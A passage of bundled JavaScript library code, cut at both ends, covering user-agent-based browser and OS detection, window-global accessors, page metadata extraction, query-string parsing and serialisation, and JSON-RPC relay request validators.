        /MSIE\s([0-9\.]+);.*Trident\/[4-7].0/
    ],
    [
        "ie",
        /MSIE\s(7\.0)/
    ],
    [
        "bb10",
        /BB10;\sTouch.*Version\/([0-9\.]+)/
    ],
    [
        "android",
        /Android\s([0-9\.]+)/
    ],
    [
        "ios",
        /Version\/([0-9\._]+).*Mobile.*Safari.*/
    ],
    [
        "safari",
        /Version\/([0-9\._]+).*Safari/
    ],
    [
        "facebook",
        /FB[AS]V\/([0-9\.]+)/
    ],
    [
        "instagram",
        /Instagram\s([0-9\.]+)/
    ],
    [
        "ios-webview",
        /AppleWebKit\/([0-9\.]+).*Mobile/
    ],
    [
        "ios-webview",
        /AppleWebKit\/([0-9\.]+).*Gecko\)$/
    ],
    [
        "curl",
        /^curl\/([0-9\.]+)$/
    ],
    [
        "searchbot",
        $48968958eb8b72e8$var$SEARCHBOX_UA_REGEX
    ]
];
var $48968958eb8b72e8$var$operatingSystemRules = [
    [
        "iOS",
        /iP(hone|od|ad)/
    ],
    [
        "Android OS",
        /Android/
    ],
    [
        "BlackBerry OS",
        /BlackBerry|BB10/
    ],
    [
        "Windows Mobile",
        /IEMobile/
    ],
    [
        "Amazon OS",
        /Kindle/
    ],
    [
        "Windows 3.11",
        /Win16/
    ],
    [
        "Windows 95",
        /(Windows 95)|(Win95)|(Windows_95)/
    ],
    [
        "Windows 98",
        /(Windows 98)|(Win98)/
    ],
    [
        "Windows 2000",
        /(Windows NT 5.0)|(Windows 2000)/
    ],
    [
        "Windows XP",
        /(Windows NT 5.1)|(Windows XP)/
    ],
    [
        "Windows Server 2003",
        /(Windows NT 5.2)/
    ],
    [
        "Windows Vista",
        /(Windows NT 6.0)/
    ],
    [
        "Windows 7",
        /(Windows NT 6.1)/
    ],
    [
        "Windows 8",
        /(Windows NT 6.2)/
    ],
    [
        "Windows 8.1",
        /(Windows NT 6.3)/
    ],
    [
        "Windows 10",
        /(Windows NT 10.0)/
    ],
    [
        "Windows ME",
        /Windows ME/
    ],
    [
        "Windows CE",
        /Windows CE|WinCE|Microsoft Pocket Internet Explorer/
    ],
    [
        "Open BSD",
        /OpenBSD/
    ],
    [
        "Sun OS",
        /SunOS/
    ],
    [
        "Chrome OS",
        /CrOS/
    ],
    [
        "Linux",
        /(Linux)|(X11)/
    ],
    [
        "Mac OS",
        /(Mac_PowerPC)|(Macintosh)/
    ],
    [
        "QNX",
        /QNX/
    ],
    [
        "BeOS",
        /BeOS/
    ],
    [
        "OS/2",
        /OS\/2/
    ]
];
function $48968958eb8b72e8$export$17b446b869dad473(userAgent) {
    if (!!userAgent) return $48968958eb8b72e8$export$1184956100eddc3c(userAgent);
    if (typeof document === "undefined" && typeof navigator !== "undefined" && navigator.product === "ReactNative") return new $48968958eb8b72e8$export$7c78fe95a9d9b03e();
    if (typeof navigator !== "undefined") return $48968958eb8b72e8$export$1184956100eddc3c(navigator.userAgent);
    return $48968958eb8b72e8$export$bf2c6630ab904918();
}
function $48968958eb8b72e8$var$matchUserAgent(ua) {
    // opted for using reduce here rather than Array#first with a regex.test call
    // this is primarily because using the reduce we only perform the regex
    // execution once rather than once for the test and for the exec again below
    // probably something that needs to be benchmarked though
    return ua !== "" && $48968958eb8b72e8$var$userAgentRules.reduce(function(matched, _a) {
        var browser = _a[0], regex = _a[1];
        if (matched) return matched;
        var uaMatch = regex.exec(ua);
        return !!uaMatch && [
            browser,
            uaMatch
        ];
    }, false);
}
function $48968958eb8b72e8$export$89ca9f8ca1a50fd5(ua) {
    var data = $48968958eb8b72e8$var$matchUserAgent(ua);
    return data ? data[0] : null;
}
function $48968958eb8b72e8$export$1184956100eddc3c(ua) {
    var matchedRule = $48968958eb8b72e8$var$matchUserAgent(ua);
    if (!matchedRule) return null;
    var name = matchedRule[0], match = matchedRule[1];
    if (name === "searchbot") return new $48968958eb8b72e8$export$cb435e1e9f86c1ff();
    // Do not use RegExp for split operation as some browser do not support it (See: http://blog.stevenlevithan.com/archives/cross-browser-split)
    var versionParts = match[1] && match[1].split(".").join("_").split("_").slice(0, 3);
    if (versionParts) {
        if (versionParts.length < $48968958eb8b72e8$var$REQUIRED_VERSION_PARTS) versionParts = $48968958eb8b72e8$var$__spreadArray($48968958eb8b72e8$var$__spreadArray([], versionParts, true), $48968958eb8b72e8$var$createVersionParts($48968958eb8b72e8$var$REQUIRED_VERSION_PARTS - versionParts.length), true);
    } else versionParts = [];
    var version = versionParts.join(".");
    var os = $48968958eb8b72e8$export$3070bd282ec37ea8(ua);
    var searchBotMatch = $48968958eb8b72e8$var$SEARCHBOT_OS_REGEX.exec(ua);
    if (searchBotMatch && searchBotMatch[1]) return new $48968958eb8b72e8$export$775de176f06fc21(name, version, os, searchBotMatch[1]);
    return new $48968958eb8b72e8$export$8fa985da04a86f0(name, version, os);
}
function $48968958eb8b72e8$export$3070bd282ec37ea8(ua) {
    for(var ii = 0, count = $48968958eb8b72e8$var$operatingSystemRules.length; ii < count; ii++){
        var _a = $48968958eb8b72e8$var$operatingSystemRules[ii], os = _a[0], regex = _a[1];
        var match = regex.exec(ua);
        if (match) return os;
    }
    return null;
}
function $48968958eb8b72e8$export$bf2c6630ab904918() {
    var isNode = typeof $hPtJY !== "undefined" && $hPtJY.version;
    return isNode ? new $48968958eb8b72e8$export$62457c674e0167c0($hPtJY.version.slice(1)) : null;
}
function $48968958eb8b72e8$var$createVersionParts(count) {
    var output = [];
    for(var ii = 0; ii < count; ii++)output.push("0");
    return output;
}



var $aG48A = parcelRequire("aG48A");
var $9cba2bd26fe13e26$exports = {};
"use strict";
Object.defineProperty($9cba2bd26fe13e26$exports, "__esModule", {
    value: true
});
$9cba2bd26fe13e26$exports.getLocalStorage = $9cba2bd26fe13e26$exports.getLocalStorageOrThrow = $9cba2bd26fe13e26$exports.getCrypto = $9cba2bd26fe13e26$exports.getCryptoOrThrow = $9cba2bd26fe13e26$exports.getLocation = $9cba2bd26fe13e26$exports.getLocationOrThrow = $9cba2bd26fe13e26$exports.getNavigator = $9cba2bd26fe13e26$exports.getNavigatorOrThrow = $9cba2bd26fe13e26$exports.getDocument = $9cba2bd26fe13e26$exports.getDocumentOrThrow = $9cba2bd26fe13e26$exports.getFromWindowOrThrow = $9cba2bd26fe13e26$exports.getFromWindow = void 0;
function $9cba2bd26fe13e26$var$getFromWindow(name) {
    let res = undefined;
    if (typeof window !== "undefined" && typeof window[name] !== "undefined") res = window[name];
    return res;
}
$9cba2bd26fe13e26$exports.getFromWindow = $9cba2bd26fe13e26$var$getFromWindow;
function $9cba2bd26fe13e26$var$getFromWindowOrThrow(name) {
    const res = $9cba2bd26fe13e26$var$getFromWindow(name);
    if (!res) throw new Error(`${name} is not defined in Window`);
    return res;
}
$9cba2bd26fe13e26$exports.getFromWindowOrThrow = $9cba2bd26fe13e26$var$getFromWindowOrThrow;
function $9cba2bd26fe13e26$var$getDocumentOrThrow() {
    return $9cba2bd26fe13e26$var$getFromWindowOrThrow("document");
}
$9cba2bd26fe13e26$exports.getDocumentOrThrow = $9cba2bd26fe13e26$var$getDocumentOrThrow;
function $9cba2bd26fe13e26$var$getDocument() {
    return $9cba2bd26fe13e26$var$getFromWindow("document");
}
$9cba2bd26fe13e26$exports.getDocument = $9cba2bd26fe13e26$var$getDocument;
function $9cba2bd26fe13e26$var$getNavigatorOrThrow() {
    return $9cba2bd26fe13e26$var$getFromWindowOrThrow("navigator");
}
$9cba2bd26fe13e26$exports.getNavigatorOrThrow = $9cba2bd26fe13e26$var$getNavigatorOrThrow;
function $9cba2bd26fe13e26$var$getNavigator() {
    return $9cba2bd26fe13e26$var$getFromWindow("navigator");
}
$9cba2bd26fe13e26$exports.getNavigator = $9cba2bd26fe13e26$var$getNavigator;
function $9cba2bd26fe13e26$var$getLocationOrThrow() {
    return $9cba2bd26fe13e26$var$getFromWindowOrThrow("location");
}
$9cba2bd26fe13e26$exports.getLocationOrThrow = $9cba2bd26fe13e26$var$getLocationOrThrow;
function $9cba2bd26fe13e26$var$getLocation() {
    return $9cba2bd26fe13e26$var$getFromWindow("location");
}
$9cba2bd26fe13e26$exports.getLocation = $9cba2bd26fe13e26$var$getLocation;
function $9cba2bd26fe13e26$var$getCryptoOrThrow() {
    return $9cba2bd26fe13e26$var$getFromWindowOrThrow("crypto");
}
$9cba2bd26fe13e26$exports.getCryptoOrThrow = $9cba2bd26fe13e26$var$getCryptoOrThrow;
function $9cba2bd26fe13e26$var$getCrypto() {
    return $9cba2bd26fe13e26$var$getFromWindow("crypto");
}
$9cba2bd26fe13e26$exports.getCrypto = $9cba2bd26fe13e26$var$getCrypto;
function $9cba2bd26fe13e26$var$getLocalStorageOrThrow() {
    return $9cba2bd26fe13e26$var$getFromWindowOrThrow("localStorage");
}
$9cba2bd26fe13e26$exports.getLocalStorageOrThrow = $9cba2bd26fe13e26$var$getLocalStorageOrThrow;
function $9cba2bd26fe13e26$var$getLocalStorage() {
    return $9cba2bd26fe13e26$var$getFromWindow("localStorage");
}
$9cba2bd26fe13e26$exports.getLocalStorage = $9cba2bd26fe13e26$var$getLocalStorage;


var $6824eb17eeee766a$exports = {};
"use strict";
Object.defineProperty($6824eb17eeee766a$exports, "__esModule", {
    value: true
});
$6824eb17eeee766a$exports.getWindowMetadata = void 0;

function $6824eb17eeee766a$var$getWindowMetadata() {
    let doc;
    let loc;
    try {
        doc = $9cba2bd26fe13e26$exports.getDocumentOrThrow();
        loc = $9cba2bd26fe13e26$exports.getLocationOrThrow();
    } catch (e) {
        return null;
    }
    function getIcons() {
        const links = doc.getElementsByTagName("link");
        const icons = [];
        for(let i = 0; i < links.length; i++){
            const link = links[i];
            const rel = link.getAttribute("rel");
            if (rel) {
                if (rel.toLowerCase().indexOf("icon") > -1) {
                    const href = link.getAttribute("href");
                    if (href) {
                        if (href.toLowerCase().indexOf("https:") === -1 && href.toLowerCase().indexOf("http:") === -1 && href.indexOf("//") !== 0) {
                            let absoluteHref = loc.protocol + "//" + loc.host;
                            if (href.indexOf("/") === 0) absoluteHref += href;
                            else {
                                const path = loc.pathname.split("/");
                                path.pop();
                                const finalPath = path.join("/");
                                absoluteHref += finalPath + "/" + href;
                            }
                            icons.push(absoluteHref);
                        } else if (href.indexOf("//") === 0) {
                            const absoluteUrl = loc.protocol + href;
                            icons.push(absoluteUrl);
                        } else icons.push(href);
                    }
                }
            }
        }
        return icons;
    }
    function getWindowMetadataOfAny(...args) {
        const metaTags = doc.getElementsByTagName("meta");
        for(let i = 0; i < metaTags.length; i++){
            const tag = metaTags[i];
            const attributes = [
                "itemprop",
                "property",
                "name"
            ].map((target)=>tag.getAttribute(target)).filter((attr)=>{
                if (attr) return args.includes(attr);
                return false;
            });
            if (attributes.length && attributes) {
                const content = tag.getAttribute("content");
                if (content) return content;
            }
        }
        return "";
    }
    function getName() {
        let name = getWindowMetadataOfAny("name", "og:site_name", "og:title", "twitter:title");
        if (!name) name = doc.title;
        return name;
    }
    function getDescription() {
        const description = getWindowMetadataOfAny("description", "og:description", "twitter:description", "keywords");
        return description;
    }
    const name = getName();
    const description = getDescription();
    const url = loc.origin;
    const icons = getIcons();
    const meta = {
        description: description,
        url: url,
        icons: icons,
        name: name
    };
    return meta;
}
$6824eb17eeee766a$exports.getWindowMetadata = $6824eb17eeee766a$var$getWindowMetadata;


var $3ecb7368762fc268$export$f9380c9a627682d3;
var $3ecb7368762fc268$export$98e6a39c04603d36;
var $3ecb7368762fc268$export$fac44ee5b035f737;
var $3ecb7368762fc268$export$7a5253c0f62e0150;
var $3ecb7368762fc268$export$a8c1621ea79325d3;
var $3ecb7368762fc268$export$357523c63a2253b9;
var $3ecb7368762fc268$export$44c361b8ec72ef7f;
"use strict";
var $2854ab6fe5249e91$exports = {};
"use strict";
$2854ab6fe5249e91$exports = (str)=>encodeURIComponent(str).replace(/[!'()*]/g, (x)=>`%${x.charCodeAt(0).toString(16).toUpperCase()}`);


var $40bbc24beab9f9b8$exports = {};
"use strict";
var $40bbc24beab9f9b8$var$token = "%[a-f0-9]{2}";
var $40bbc24beab9f9b8$var$singleMatcher = new RegExp("(" + $40bbc24beab9f9b8$var$token + ")|([^%]+?)", "gi");
var $40bbc24beab9f9b8$var$multiMatcher = new RegExp("(" + $40bbc24beab9f9b8$var$token + ")+", "gi");
function $40bbc24beab9f9b8$var$decodeComponents(components, split) {
    try {
        // Try to decode the entire string first
        return [
            decodeURIComponent(components.join(""))
        ];
    } catch (err) {
    // Do nothing
    }
    if (components.length === 1) return components;
    split = split || 1;
    // Split the array in 2 parts
    var left = components.slice(0, split);
    var right = components.slice(split);
    return Array.prototype.concat.call([], $40bbc24beab9f9b8$var$decodeComponents(left), $40bbc24beab9f9b8$var$decodeComponents(right));
}
function $40bbc24beab9f9b8$var$decode(input) {
    try {
        return decodeURIComponent(input);
    } catch (err) {
        var tokens = input.match($40bbc24beab9f9b8$var$singleMatcher) || [];
        for(var i = 1; i < tokens.length; i++){
            input = $40bbc24beab9f9b8$var$decodeComponents(tokens, i).join("");
            tokens = input.match($40bbc24beab9f9b8$var$singleMatcher) || [];
        }
        return input;
    }
}
function $40bbc24beab9f9b8$var$customDecodeURIComponent(input) {
    // Keep track of all the replacements and prefill the map with the `BOM`
    var replaceMap = {
        "%FE%FF": "��",
        "%FF%FE": "��"
    };
    var match = $40bbc24beab9f9b8$var$multiMatcher.exec(input);
    while(match){
        try {
            // Decode as big chunks as possible
            replaceMap[match[0]] = decodeURIComponent(match[0]);
        } catch (err) {
            var result = $40bbc24beab9f9b8$var$decode(match[0]);
            if (result !== match[0]) replaceMap[match[0]] = result;
        }
        match = $40bbc24beab9f9b8$var$multiMatcher.exec(input);
    }
    // Add `%C2` at the end of the map to make sure it does not replace the combinator before everything else
    replaceMap["%C2"] = "�";
    var entries = Object.keys(replaceMap);
    for(var i = 0; i < entries.length; i++){
        // Replace all decoded components
        var key = entries[i];
        input = input.replace(new RegExp(key, "g"), replaceMap[key]);
    }
    return input;
}
$40bbc24beab9f9b8$exports = function(encodedURI) {
    if (typeof encodedURI !== "string") throw new TypeError("Expected `encodedURI` to be of type `string`, got `" + typeof encodedURI + "`");
    try {
        encodedURI = encodedURI.replace(/\+/g, " ");
        // Try the built in decoder first
        return decodeURIComponent(encodedURI);
    } catch (err) {
        // Fallback to a more advanced decoder
        return $40bbc24beab9f9b8$var$customDecodeURIComponent(encodedURI);
    }
};


var $08bd16383ca1ef3d$exports = {};
"use strict";
$08bd16383ca1ef3d$exports = (string, separator)=>{
    if (!(typeof string === "string" && typeof separator === "string")) throw new TypeError("Expected the arguments to be of type `string`");
    if (separator === "") return [
        string
    ];
    const separatorIndex = string.indexOf(separator);
    if (separatorIndex === -1) return [
        string
    ];
    return [
        string.slice(0, separatorIndex),
        string.slice(separatorIndex + separator.length)
    ];
};


var $36fe9d1ef26e3f64$exports = {};
"use strict";
$36fe9d1ef26e3f64$exports = function(obj, predicate) {
    var ret = {};
    var keys = Object.keys(obj);
    var isArr = Array.isArray(predicate);
    for(var i = 0; i < keys.length; i++){
        var key = keys[i];
        var val = obj[key];
        if (isArr ? predicate.indexOf(key) !== -1 : predicate(key, val, obj)) ret[key] = val;
    }
    return ret;
};


const $3ecb7368762fc268$var$isNullOrUndefined = (value)=>value === null || value === undefined;
const $3ecb7368762fc268$var$encodeFragmentIdentifier = Symbol("encodeFragmentIdentifier");
function $3ecb7368762fc268$var$encoderForArrayFormat(options) {
    switch(options.arrayFormat){
        case "index":
            return (key)=>(result, value)=>{
                    const index = result.length;
                    if (value === undefined || options.skipNull && value === null || options.skipEmptyString && value === "") return result;
                    if (value === null) return [
                        ...result,
                        [
                            $3ecb7368762fc268$var$encode(key, options),
                            "[",
                            index,
                            "]"
                        ].join("")
                    ];
                    return [
                        ...result,
                        [
                            $3ecb7368762fc268$var$encode(key, options),
                            "[",
                            $3ecb7368762fc268$var$encode(index, options),
                            "]=",
                            $3ecb7368762fc268$var$encode(value, options)
                        ].join("")
                    ];
                };
        case "bracket":
            return (key)=>(result, value)=>{
                    if (value === undefined || options.skipNull && value === null || options.skipEmptyString && value === "") return result;
                    if (value === null) return [
                        ...result,
                        [
                            $3ecb7368762fc268$var$encode(key, options),
                            "[]"
                        ].join("")
                    ];
                    return [
                        ...result,
                        [
                            $3ecb7368762fc268$var$encode(key, options),
                            "[]=",
                            $3ecb7368762fc268$var$encode(value, options)
                        ].join("")
                    ];
                };
        case "colon-list-separator":
            return (key)=>(result, value)=>{
                    if (value === undefined || options.skipNull && value === null || options.skipEmptyString && value === "") return result;
                    if (value === null) return [
                        ...result,
                        [
                            $3ecb7368762fc268$var$encode(key, options),
                            ":list="
                        ].join("")
                    ];
                    return [
                        ...result,
                        [
                            $3ecb7368762fc268$var$encode(key, options),
                            ":list=",
                            $3ecb7368762fc268$var$encode(value, options)
                        ].join("")
                    ];
                };
        case "comma":
        case "separator":
        case "bracket-separator":
            {
                const keyValueSep = options.arrayFormat === "bracket-separator" ? "[]=" : "=";
                return (key)=>(result, value)=>{
                        if (value === undefined || options.skipNull && value === null || options.skipEmptyString && value === "") return result;
                        // Translate null to an empty string so that it doesn't serialize as 'null'
                        value = value === null ? "" : value;
                        if (result.length === 0) return [
                            [
                                $3ecb7368762fc268$var$encode(key, options),
                                keyValueSep,
                                $3ecb7368762fc268$var$encode(value, options)
                            ].join("")
                        ];
                        return [
                            [
                                result,
                                $3ecb7368762fc268$var$encode(value, options)
                            ].join(options.arrayFormatSeparator)
                        ];
                    };
            }
        default:
            return (key)=>(result, value)=>{
                    if (value === undefined || options.skipNull && value === null || options.skipEmptyString && value === "") return result;
                    if (value === null) return [
                        ...result,
                        $3ecb7368762fc268$var$encode(key, options)
                    ];
                    return [
                        ...result,
                        [
                            $3ecb7368762fc268$var$encode(key, options),
                            "=",
                            $3ecb7368762fc268$var$encode(value, options)
                        ].join("")
                    ];
                };
    }
}
function $3ecb7368762fc268$var$parserForArrayFormat(options) {
    let result;
    switch(options.arrayFormat){
        case "index":
            return (key, value, accumulator)=>{
                result = /\[(\d*)\]$/.exec(key);
                key = key.replace(/\[\d*\]$/, "");
                if (!result) {
                    accumulator[key] = value;
                    return;
                }
                if (accumulator[key] === undefined) accumulator[key] = {};
                accumulator[key][result[1]] = value;
            };
        case "bracket":
            return (key, value, accumulator)=>{
                result = /(\[\])$/.exec(key);
                key = key.replace(/\[\]$/, "");
                if (!result) {
                    accumulator[key] = value;
                    return;
                }
                if (accumulator[key] === undefined) {
                    accumulator[key] = [
                        value
                    ];
                    return;
                }
                accumulator[key] = [].concat(accumulator[key], value);
            };
        case "colon-list-separator":
            return (key, value, accumulator)=>{
                result = /(:list)$/.exec(key);
                key = key.replace(/:list$/, "");
                if (!result) {
                    accumulator[key] = value;
                    return;
                }
                if (accumulator[key] === undefined) {
                    accumulator[key] = [
                        value
                    ];
                    return;
                }
                accumulator[key] = [].concat(accumulator[key], value);
            };
        case "comma":
        case "separator":
            return (key, value, accumulator)=>{
                const isArray = typeof value === "string" && value.includes(options.arrayFormatSeparator);
                const isEncodedArray = typeof value === "string" && !isArray && $3ecb7368762fc268$var$decode(value, options).includes(options.arrayFormatSeparator);
                value = isEncodedArray ? $3ecb7368762fc268$var$decode(value, options) : value;
                const newValue = isArray || isEncodedArray ? value.split(options.arrayFormatSeparator).map((item)=>$3ecb7368762fc268$var$decode(item, options)) : value === null ? value : $3ecb7368762fc268$var$decode(value, options);
                accumulator[key] = newValue;
            };
        case "bracket-separator":
            return (key, value, accumulator)=>{
                const isArray = /(\[\])$/.test(key);
                key = key.replace(/\[\]$/, "");
                if (!isArray) {
                    accumulator[key] = value ? $3ecb7368762fc268$var$decode(value, options) : value;
                    return;
                }
                const arrayValue = value === null ? [] : value.split(options.arrayFormatSeparator).map((item)=>$3ecb7368762fc268$var$decode(item, options));
                if (accumulator[key] === undefined) {
                    accumulator[key] = arrayValue;
                    return;
                }
                accumulator[key] = [].concat(accumulator[key], arrayValue);
            };
        default:
            return (key, value, accumulator)=>{
                if (accumulator[key] === undefined) {
                    accumulator[key] = value;
                    return;
                }
                accumulator[key] = [].concat(accumulator[key], value);
            };
    }
}
function $3ecb7368762fc268$var$validateArrayFormatSeparator(value) {
    if (typeof value !== "string" || value.length !== 1) throw new TypeError("arrayFormatSeparator must be single character string");
}
function $3ecb7368762fc268$var$encode(value, options) {
    if (options.encode) return options.strict ? $2854ab6fe5249e91$exports(value) : encodeURIComponent(value);
    return value;
}
function $3ecb7368762fc268$var$decode(value, options) {
    if (options.decode) return $40bbc24beab9f9b8$exports(value);
    return value;
}
function $3ecb7368762fc268$var$keysSorter(input) {
    if (Array.isArray(input)) return input.sort();
    if (typeof input === "object") return $3ecb7368762fc268$var$keysSorter(Object.keys(input)).sort((a, b)=>Number(a) - Number(b)).map((key)=>input[key]);
    return input;
}
function $3ecb7368762fc268$var$removeHash(input) {
    const hashStart = input.indexOf("#");
    if (hashStart !== -1) input = input.slice(0, hashStart);
    return input;
}
function $3ecb7368762fc268$var$getHash(url) {
    let hash = "";
    const hashStart = url.indexOf("#");
    if (hashStart !== -1) hash = url.slice(hashStart);
    return hash;
}
function $3ecb7368762fc268$var$extract(input) {
    input = $3ecb7368762fc268$var$removeHash(input);
    const queryStart = input.indexOf("?");
    if (queryStart === -1) return "";
    return input.slice(queryStart + 1);
}
function $3ecb7368762fc268$var$parseValue(value, options) {
    if (options.parseNumbers && !Number.isNaN(Number(value)) && typeof value === "string" && value.trim() !== "") value = Number(value);
    else if (options.parseBooleans && value !== null && (value.toLowerCase() === "true" || value.toLowerCase() === "false")) value = value.toLowerCase() === "true";
    return value;
}
function $3ecb7368762fc268$var$parse(query, options) {
    options = Object.assign({
        decode: true,
        sort: true,
        arrayFormat: "none",
        arrayFormatSeparator: ",",
        parseNumbers: false,
        parseBooleans: false
    }, options);
    $3ecb7368762fc268$var$validateArrayFormatSeparator(options.arrayFormatSeparator);
    const formatter = $3ecb7368762fc268$var$parserForArrayFormat(options);
    // Create an object with no prototype
    const ret = Object.create(null);
    if (typeof query !== "string") return ret;
    query = query.trim().replace(/^[?#&]/, "");
    if (!query) return ret;
    for (const param of query.split("&")){
        if (param === "") continue;
        let [key, value] = $08bd16383ca1ef3d$exports(options.decode ? param.replace(/\+/g, " ") : param, "=");
        // Missing `=` should be `null`:
        // http://w3.org/TR/2012/WD-url-20120524/#collect-url-parameters
        value = value === undefined ? null : [
            "comma",
            "separator",
            "bracket-separator"
        ].includes(options.arrayFormat) ? value : $3ecb7368762fc268$var$decode(value, options);
        formatter($3ecb7368762fc268$var$decode(key, options), value, ret);
    }
    for (const key of Object.keys(ret)){
        const value = ret[key];
        if (typeof value === "object" && value !== null) for (const k of Object.keys(value))value[k] = $3ecb7368762fc268$var$parseValue(value[k], options);
        else ret[key] = $3ecb7368762fc268$var$parseValue(value, options);
    }
    if (options.sort === false) return ret;
    return (options.sort === true ? Object.keys(ret).sort() : Object.keys(ret).sort(options.sort)).reduce((result, key)=>{
        const value = ret[key];
        if (Boolean(value) && typeof value === "object" && !Array.isArray(value)) // Sort object keys, not values
        result[key] = $3ecb7368762fc268$var$keysSorter(value);
        else result[key] = value;
        return result;
    }, Object.create(null));
}
$3ecb7368762fc268$export$f9380c9a627682d3 = $3ecb7368762fc268$var$extract;
$3ecb7368762fc268$export$98e6a39c04603d36 = $3ecb7368762fc268$var$parse;
$3ecb7368762fc268$export$fac44ee5b035f737 = (object, options)=>{
    if (!object) return "";
    options = Object.assign({
        encode: true,
        strict: true,
        arrayFormat: "none",
        arrayFormatSeparator: ","
    }, options);
    $3ecb7368762fc268$var$validateArrayFormatSeparator(options.arrayFormatSeparator);
    const shouldFilter = (key)=>options.skipNull && $3ecb7368762fc268$var$isNullOrUndefined(object[key]) || options.skipEmptyString && object[key] === "";
    const formatter = $3ecb7368762fc268$var$encoderForArrayFormat(options);
    const objectCopy = {};
    for (const key of Object.keys(object))if (!shouldFilter(key)) objectCopy[key] = object[key];
    const keys = Object.keys(objectCopy);
    if (options.sort !== false) keys.sort(options.sort);
    return keys.map((key)=>{
        const value = object[key];
        if (value === undefined) return "";
        if (value === null) return $3ecb7368762fc268$var$encode(key, options);
        if (Array.isArray(value)) {
            if (value.length === 0 && options.arrayFormat === "bracket-separator") return $3ecb7368762fc268$var$encode(key, options) + "[]";
            return value.reduce(formatter(key), []).join("&");
        }
        return $3ecb7368762fc268$var$encode(key, options) + "=" + $3ecb7368762fc268$var$encode(value, options);
    }).filter((x)=>x.length > 0).join("&");
};
$3ecb7368762fc268$export$7a5253c0f62e0150 = (url, options)=>{
    options = Object.assign({
        decode: true
    }, options);
    const [url_, hash] = $08bd16383ca1ef3d$exports(url, "#");
    return Object.assign({
        url: url_.split("?")[0] || "",
        query: $3ecb7368762fc268$var$parse($3ecb7368762fc268$var$extract(url), options)
    }, options && options.parseFragmentIdentifier && hash ? {
        fragmentIdentifier: $3ecb7368762fc268$var$decode(hash, options)
    } : {});
};
$3ecb7368762fc268$export$a8c1621ea79325d3 = (object, options)=>{
    options = Object.assign({
        encode: true,
        strict: true,
        [$3ecb7368762fc268$var$encodeFragmentIdentifier]: true
    }, options);
    const url = $3ecb7368762fc268$var$removeHash(object.url).split("?")[0] || "";
    const queryFromUrl = $3ecb7368762fc268$export$f9380c9a627682d3(object.url);
    const parsedQueryFromUrl = $3ecb7368762fc268$export$98e6a39c04603d36(queryFromUrl, {
        sort: false
    });
    const query = Object.assign(parsedQueryFromUrl, object.query);
    let queryString = $3ecb7368762fc268$export$fac44ee5b035f737(query, options);
    if (queryString) queryString = `?${queryString}`;
    let hash = $3ecb7368762fc268$var$getHash(object.url);
    if (object.fragmentIdentifier) hash = `#${options[$3ecb7368762fc268$var$encodeFragmentIdentifier] ? $3ecb7368762fc268$var$encode(object.fragmentIdentifier, options) : object.fragmentIdentifier}`;
    return `${url}${queryString}${hash}`;
};
$3ecb7368762fc268$export$357523c63a2253b9 = (input, filter, options)=>{
    options = Object.assign({
        parseFragmentIdentifier: true,
        [$3ecb7368762fc268$var$encodeFragmentIdentifier]: false
    }, options);
    const { url: url, query: query, fragmentIdentifier: fragmentIdentifier } = $3ecb7368762fc268$export$7a5253c0f62e0150(input, options);
    return $3ecb7368762fc268$export$a8c1621ea79325d3({
        url: url,
        query: $36fe9d1ef26e3f64$exports(query, filter),
        fragmentIdentifier: fragmentIdentifier
    }, options);
};
$3ecb7368762fc268$export$44c361b8ec72ef7f = (input, filter, options)=>{
    const exclusionFilter = Array.isArray(filter) ? (key)=>!filter.includes(key) : (key, value)=>!filter(key, value);
    return $3ecb7368762fc268$export$357523c63a2253b9(input, exclusionFilter, options);
};


var $6c5e0cebe7c6e693$exports = {};
$parcel$export($6c5e0cebe7c6e693$exports, "RELAY_JSONRPC", () => $a66838b5a814eb12$export$af490b3b9a6de00f);
var $7dcde13c6df73f83$exports = {};


function $770bbe0a33a0b266$export$804de46662e4ac95(obj, key, type = "string") {
    if (!obj[key] || typeof obj[key] !== type) throw new Error(`Missing or invalid "${key}" param`);
}
function $770bbe0a33a0b266$export$c538c02216fcdc03(params, required) {
    let matches = true;
    required.forEach((key)=>{
        const exists = key in params;
        if (!exists) matches = false;
    });
    return matches;
}
function $770bbe0a33a0b266$export$e4b3f942a6d00ef9(params, length) {
    return Array.isArray(params) ? params.length === length : Object.keys(params).length === length;
}
function $770bbe0a33a0b266$export$8fcd263f2845753e(params, minLength) {
    return Array.isArray(params) ? params.length >= minLength : Object.keys(params).length >= minLength;
}
function $770bbe0a33a0b266$export$19e8e281e27dafad(params, required, optional) {
    const exact = !optional.length;
    const matchesLength = exact ? $770bbe0a33a0b266$export$e4b3f942a6d00ef9(params, required.length) : $770bbe0a33a0b266$export$8fcd263f2845753e(params, required.length);
    if (!matchesLength) return false;
    return $770bbe0a33a0b266$export$c538c02216fcdc03(params, required);
}
function $770bbe0a33a0b266$export$18337b4ba58d5c33(method, expected, separator = "_") {
    const split = method.split(separator);
    return split[split.length - 1].trim().toLowerCase() === expected.trim().toLowerCase();
}



function $d7228e581edf756b$export$c75580565fa025bd(request) {
    return $d7228e581edf756b$export$f576347163de0984(request.method) && $d7228e581edf756b$export$dae2311546d43680(request.params);
}
function $d7228e581edf756b$export$f576347163de0984(method) {
    return (0, $770bbe0a33a0b266$export$18337b4ba58d5c33)(method, "subscribe");
}
function $d7228e581edf756b$export$dae2311546d43680(params) {
    const required = [
        "topic"
    ];
    const optional = [];
    return (0, $770bbe0a33a0b266$export$19e8e281e27dafad)(params, required, optional);
}
function $d7228e581edf756b$export$8fa7cf76b41caee0(request) {
    return $d7228e581edf756b$export$71d4d33ac7f7a269(request.method) && $d7228e581edf756b$export$71e8d1aa48c3e86f(request.params);
}
function $d7228e581edf756b$export$71d4d33ac7f7a269(method) {
    return (0, $770bbe0a33a0b266$export$18337b4ba58d5c33)(method, "publish");
}
function $d7228e581edf756b$export$71e8d1aa48c3e86f(params) {
    const required = [
        "message",
        "topic",
        "ttl"
    ];
    const optional = [
        "prompt",
        "tag"
    ];
    return (0, $770bbe0a33a0b266$export$19e8e281e27dafad)(params, required, optional);
}
function $d7228e581edf756b$export$83e292763180b41b(request) {
    return $d7228e581edf756b$export$568d956f39536025(request.method) && $d7228e581edf756b$export$cbc597c53c3b4f80(request.params);
}
function $d7228e581edf756b$export$568d956f39536025(method) {
    return (0, $770bbe0a33a0b266$export$18337b4ba58d5c33)(method, "unsubscribe");
}
function $d7228e581edf756b$export$cbc597c53c3b4f80(params) {
    const required = [
        "id",
        "topic"
    ];
    const optional = [];
    return (0, $770bbe0a33a0b266$export$19e8e281e27dafad)(params, required, optional);
}
function $d7228e581edf756b$export$43cf4100d6287b8e(request) {
